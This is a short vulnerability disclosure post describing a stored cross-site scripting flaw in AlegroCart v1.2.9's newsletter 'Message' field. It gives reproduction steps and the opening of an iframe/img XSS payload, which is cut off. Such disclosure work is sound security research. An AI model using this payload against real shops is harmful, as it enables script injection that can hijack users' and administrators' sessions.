Stored XSS in “Message” Functionality – AlegroCart v1.2.9 – Full Disclosure
Posted by Andrey Stoykov on Apr 23
# Exploit Title: Stored XSS in “Message” Functionality – AlegroCart v1.2.9
# Date: 04/2025
# Exploit Author: Andrey Stoykov
# Version: 1.2.9
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/
Stored XSS #1:
Steps to Reproduce:
1. Log in as the demonstrator account and visit “Customers” > “Newsletter”
2. In “Message”, use the following XSS payload:
<iframe srcdoc=”<img src=x…